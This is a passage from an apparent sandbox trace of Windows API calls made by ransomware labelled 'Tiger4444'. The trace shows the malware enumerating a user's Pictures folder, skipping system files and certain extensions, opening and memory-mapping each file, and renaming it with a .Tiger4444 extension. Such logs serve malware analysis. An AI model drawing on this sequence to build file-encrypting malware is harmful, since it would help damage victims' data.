(lpString1="C876_Q.gif", lpString2="ids.txt") returned -1 [0045.526] lstrcmpiW (lpString1="C876_Q.gif", lpString2="NTUSER.DAT") returned -1 [0045.526] lstrcpyW (in: lpString1=0x30aeada, lpString2="C876_Q.gif" | out: lpString1="C876_Q.gif") returned="C876_Q.gif" [0045.526] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\C876_Q.gif", dwFileAttributes=0x0) returned 1 [0045.527] lstrlenW (lpString="C876_Q.gif") returned 10 [0045.527] lstrlenW (lpString="Tiger4444") returned 9 [0045.527] lstrcmpiW (lpString1="876_Q.gif", lpString2="Tiger4444") returned -1 [0045.527] lstrlenW (lpString=".dll") returned 4 [0045.527] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0045.527] lstrlenW (lpString=".lnk") returned 4 [0045.527] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0045.527] lstrlenW (lpString=".ini") returned 4 [0045.527] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0045.527] lstrlenW (lpString=".sys") returned 4 [0045.527] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0045.527] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\C876_Q.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\c876_q.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.527] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.527] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13698005876) returned 1 [0045.527] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=58820) returned 1 [0045.527] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0045.527] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0045.527] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe8d0, lpName=0x0) returned 0x2c8 [0045.527] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe8d0) returned 0xbe0000 [0045.528] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.528] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0045.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.528] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0045.529] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0045.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0045.529] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13698194075) returned 1 [0045.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0045.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0045.529] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.529] CloseHandle (hObject=0x2c8) returned 1 [0045.530] CloseHandle (hObject=0x260) returned 1 [0045.531] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\C876_Q.gif.Tiger4444") returned 45 [0045.531] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\C876_Q.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\c876_q.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\C876_Q.gif.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\c876_q.gif.tiger4444"), dwFlags=0x1) returned 1 [0045.532] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=58832 | out: Addend=0xc6f980) returned 16919984 [0045.532] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4485 [0045.532] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0045.532] lstrcmpiW (lpString1="Camera Roll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.532] lstrcmpiW (lpString1="Camera Roll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.532] lstrcmpiW (lpString1="Camera Roll", lpString2="Tiger4444.exe") returned -1 [0045.532] lstrcmpiW (lpString1="Camera Roll", lpString2=".") returned 1 [0045.532] lstrcmpiW (lpString1="Camera Roll", lpString2="..") returned 1 [0045.532] lstrcmpiW (lpString1="Camera Roll", lpString2="windows") returned -1 [0045.532] lstrcmpiW (lpString1="Camera Roll", lpString2="bootmgr") returned 1 [0045.532] lstrcmpiW (lpString1="Camera Roll", lpString2="pagefile.sys") returned -1 [0045.532] lstrcmpiW (lpString1="Camera Roll", lpString2="boot") returned 1 [0045.532] lstrcmpiW (lpString1="Camera Roll", lpString2="ids.txt") returned -1 [0045.532] lstrcmpiW (lpString1="Camera Roll", lpString2="NTUSER.DAT") returned -1 [0045.532] lstrcpyW (in: lpString1=0x30aeada, lpString2="Camera Roll" | out: lpString1="Camera Roll") returned="Camera Roll" [0045.532] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", dwFileAttributes=0x10) returned 1 [0045.532] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc5a720 [0045.532] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x4a) returned 0xc60fe8 [0045.532] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc5a728 | out: ListHead=0xc66828, ListEntry=0xc5a728) returned 0xc66528 [0045.532] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0045.533] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.533] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.533] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0045.533] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0045.533] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0045.533] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0045.533] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0045.533] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0045.533] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0045.533] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0045.533] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0045.533] lstrcpyW (in: lpString1=0x30aeada, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0045.533] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini", dwFileAttributes=0x22) returned 1 [0045.533] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini", dwFileAttributes=0x6) returned 1 [0045.533] lstrlenW (lpString="desktop.ini") returned 11 [0045.533] lstrlenW (lpString="Tiger4444") returned 9 [0045.533] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0045.533] lstrlenW (lpString=".dll") returned 4 [0045.533] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0045.533] lstrlenW (lpString=".lnk") returned 4 [0045.533] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0045.533] lstrlenW (lpString=".ini") returned 4 [0045.533] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0045.533] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbd8b760, ftCreationTime.dwHighDateTime=0x1d4ce4b, ftLastAccessTime.dwLowDateTime=0x4a539f20, ftLastAccessTime.dwHighDateTime=0x1d4d25e, ftLastWriteTime.dwLowDateTime=0x4a539f20, ftLastWriteTime.dwHighDateTime=0x1d4d25e, nFileSizeHigh=0x0, nFileSizeLow=0xbfbf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ES -V29.bmp", cAlternateFileName="ES-V29~1.BMP")) returned 1 [0045.533] lstrcmpiW (lpString1="ES -V29.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.533] lstrcmpiW (lpString1="ES -V29.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.533] lstrcmpiW (lpString1="ES -V29.bmp", lpString2="Tiger4444.exe") returned -1 [0045.533] lstrcmpiW (lpString1="ES -V29.bmp", lpString2=".") returned 1 [0045.533] lstrcmpiW (lpString1="ES -V29.bmp", lpString2="..") returned 1 [0045.533] lstrcmpiW (lpString1="ES -V29.bmp", lpString2="windows") returned -1 [0045.534] lstrcmpiW (lpString1="ES -V29.bmp", lpString2="bootmgr") returned 1 [0045.534] lstrcmpiW (lpString1="ES -V29.bmp", lpString2="pagefile.sys") returned -1 [0045.534] lstrcmpiW (lpString1="ES -V29.bmp", lpString2="boot") returned 1 [0045.534] lstrcmpiW (lpString1="ES -V29.bmp", lpString2="ids.txt") returned -1 [0045.534] lstrcmpiW (lpString1="ES -V29.bmp", lpString2="NTUSER.DAT") returned -1 [0045.534] lstrcpyW (in: lpString1=0x30aeada, lpString2="ES -V29.bmp" | out: lpString1="ES -V29.bmp") returned="ES -V29.bmp" [0045.534] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ES -V29.bmp", dwFileAttributes=0x0) returned 1 [0045.534] lstrlenW (lpString="ES -V29.bmp") returned 11 [0045.534] lstrlenW (lpString="Tiger4444") returned 9 [0045.534] lstrcmpiW (lpString1=" -V29.bmp", lpString2="Tiger4444") returned -1 [0045.534] lstrlenW (lpString=".dll") returned 4 [0045.534] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0045.534] lstrlenW (lpString=".lnk") returned 4 [0045.534] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0045.534] lstrlenW (lpString=".ini") returned 4 [0045.534] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0045.534] lstrlenW (lpString=".sys") returned 4 [0045.534] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0045.534] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ES -V29.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\es -v29.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.534] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.534] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13698735045) returned 1 [0045.534] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=49087) returned 1 [0045.534] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0045.534] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0045.534] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc2c0, lpName=0x0) returned 0x2c8 [0045.535] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc2c0) returned 0xbe0000 [0045.536] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.536] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.536] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0045.536] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0045.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.537] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13698983499) returned 1 [0045.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0045.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0045.537] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.537] CloseHandle (hObject=0x2c8) returned 1 [0045.537] CloseHandle (hObject=0x260) returned 1 [0045.539] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\ES -V29.bmp.Tiger4444") returned 46 [0045.539] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\ES -V29.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\es -v29.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\ES -V29.bmp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\es -v29.bmp.tiger4444"), dwFlags=0x1) returned 1 [0045.540] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=49088 | out: Addend=0xc6f980) returned 16978816 [0045.540] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4486 [0045.540] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73f63c40, ftCreationTime.dwHighDateTime=0x1d4d22f, ftLastAccessTime.dwLowDateTime=0x32ade320, ftLastAccessTime.dwHighDateTime=0x1d4cf35, ftLastWriteTime.dwLowDateTime=0x32ade320, ftLastWriteTime.dwHighDateTime=0x1d4cf35, nFileSizeHigh=0x0, nFileSizeLow=0x497d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f5nrkb2LotgtwH.gif", cAlternateFileName="F5NRKB~1.GIF")) returned 1 [0045.540] lstrcmpiW (lpString1="f5nrkb2LotgtwH.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.540] lstrcmpiW (lpString1="f5nrkb2LotgtwH.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.540] lstrcmpiW (lpString1="f5nrkb2LotgtwH.gif", lpString2="Tiger4444.exe") returned -1 [0045.540] lstrcmpiW (lpString1="f5nrkb2LotgtwH.gif", lpString2=".") returned 1 [0045.540] lstrcmpiW (lpString1="f5nrkb2LotgtwH.gif", lpString2="..") returned 1 [0045.540] lstrcmpiW (lpString1="f5nrkb2LotgtwH.gif", lpString2="windows") returned -1 [0045.540] lstrcmpiW (lpString1="f5nrkb2LotgtwH.gif", lpString2="bootmgr") returned 1 [0045.540] lstrcmpiW (lpString1="f5nrkb2LotgtwH.gif", lpString2="pagefile.sys") returned -1 [0045.540] lstrcmpiW (lpString1="f5nrkb2LotgtwH.gif", lpString2="boot") returned 1 [0045.540] lstrcmpiW (lpString1="f5nrkb2LotgtwH.gif", lpString2="ids.txt") returned -1 [0045.540] lstrcmpiW (lpString1="f5nrkb2LotgtwH.gif", lpString2="NTUSER.DAT") returned -1 [0045.540] lstrcpyW (in: lpString1=0x30aeada, lpString2="f5nrkb2LotgtwH.gif" | out: lpString1="f5nrkb2LotgtwH.gif") returned="f5nrkb2LotgtwH.gif" [0045.540] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\f5nrkb2LotgtwH.gif", dwFileAttributes=0x0) returned 1 [0045.540] lstrlenW (lpString="f5nrkb2LotgtwH.gif") returned 18 [0045.540] lstrlenW (lpString="Tiger4444") returned 9 [0045.540] lstrcmpiW (lpString1="tgtwH.gif", lpString2="Tiger4444") returned -1 [0045.540] lstrlenW (lpString=".dll") returned 4 [0045.540] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0045.540] lstrlenW (lpString=".lnk") returned 4 [0045.540] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0045.540] lstrlenW (lpString=".ini") returned 4 [0045.540] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0045.540] lstrlenW (lpString=".sys") returned 4 [0045.540] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0045.540] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\f5nrkb2LotgtwH.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f5nrkb2lotgtwh.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.541] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.541] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13699373621) returned 1 [0045.541] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=18813) returned 1 [0045.541] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0045.541] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0045.541] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4c80, lpName=0x0) returned 0x2c8 [0045.541] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c80) returned 0xbe0000 [0045.541] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.541] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0045.542] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.542] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0045.542] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.542] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0045.542] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.542] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0045.542] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13699524423) returned 1 [0045.542] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0045.542] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0045.542] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.542] CloseHandle (hObject=0x2c8) returned 1 [0045.543] CloseHandle (hObject=0x260) returned 1 [0045.544] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\f5nrkb2LotgtwH.gif.Tiger4444") returned 53 [0045.544] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\f5nrkb2LotgtwH.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f5nrkb2lotgtwh.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\f5nrkb2LotgtwH.gif.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\f5nrkb2lotgtwh.gif.tiger4444"), dwFlags=0x1) returned 1 [0045.548] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=18816 | out: Addend=0xc6f980) returned 17027904 [0045.548] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4488 [0045.548] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa486e630, ftCreationTime.dwHighDateTime=0x1d4c7b1, ftLastAccessTime.dwLowDateTime=0x76fec3e0, ftLastAccessTime.dwHighDateTime=0x1d4c8c4, ftLastWriteTime.dwLowDateTime=0x76fec3e0, ftLastWriteTime.dwHighDateTime=0x1d4c8c4, nFileSizeHigh=0x0, nFileSizeLow=0x8154, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FCOwn.bmp", cAlternateFileName="")) returned 1 [0045.548] lstrcmpiW (lpString1="FCOwn.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.548] lstrcmpiW (lpString1="FCOwn.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.548] lstrcmpiW (lpString1="FCOwn.bmp", lpString2="Tiger4444.exe") returned -1 [0045.548] lstrcmpiW (lpString1="FCOwn.bmp", lpString2=".") returned 1 [0045.548] lstrcmpiW (lpString1="FCOwn.bmp", lpString2="..") returned 1 [0045.548] lstrcmpiW (lpString1="FCOwn.bmp", lpString2="windows") returned -1 [0045.548] lstrcmpiW (lpString1="FCOwn.bmp", lpString2="bootmgr") returned 1 [0045.548] lstrcmpiW (lpString1="FCOwn.bmp", lpString2="pagefile.sys") returned -1 [0045.548] lstrcmpiW (lpString1="FCOwn.bmp", lpString2="boot") returned 1 [0045.548] lstrcmpiW (lpString1="FCOwn.bmp", lpString2="ids.txt") returned -1 [0045.548] lstrcmpiW (lpString1="FCOwn.bmp", lpString2="NTUSER.DAT") returned -1 [0045.548] lstrcpyW (in: lpString1=0x30aeada, lpString2="FCOwn.bmp" | out: lpString1="FCOwn.bmp") returned="FCOwn.bmp" [0045.548] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\FCOwn.bmp", dwFileAttributes=0x0) returned 1 [0045.548] lstrlenW (lpString="FCOwn.bmp") returned 9 [0045.548] lstrlenW (lpString="Tiger4444") returned 9 [0045.548] lstrcmpiW (lpString1="FCOwn.bmp", lpString2="Tiger4444") returned -1 [0045.548] lstrlenW (lpString=".dll") returned 4 [0045.548] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0045.548] lstrlenW (lpString=".lnk") returned 4 [0045.548] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0045.548] lstrlenW (lpString=".ini") returned 4 [0045.548] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0045.549] lstrlenW (lpString=".sys") returned 4 [0045.549] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0045.549] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\FCOwn.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\fcown.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.549] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.549] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13700190156) returned 1 [0045.549] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=33108) returned 1 [0045.549] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0045.549] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0045.549] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8460, lpName=0x0) returned 0x2c8 [0045.549] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8460) returned 0xbe0000 [0045.550] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.550] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0045.550] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.550] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0045.550] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.550] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0045.550] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.550] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0045.550] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13700343538) returned 1 [0045.550] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0045.550] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0045.550] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.551] CloseHandle (hObject=0x2c8) returned 1 [0045.551] CloseHandle (hObject=0x260) returned 1 [0045.554] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\FCOwn.bmp.Tiger4444") returned 44 [0045.554] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\FCOwn.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\fcown.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\FCOwn.bmp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\fcown.bmp.tiger4444"), dwFlags=0x1) returned 1 [0045.554] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=33120 | out: Addend=0xc6f980) returned 17046720 [0045.554] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4489 [0045.554] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf91fa150, ftCreationTime.dwHighDateTime=0x1d4d5df, ftLastAccessTime.dwLowDateTime=0xcc4f1e20, ftLastAccessTime.dwHighDateTime=0x1d4d4a0, 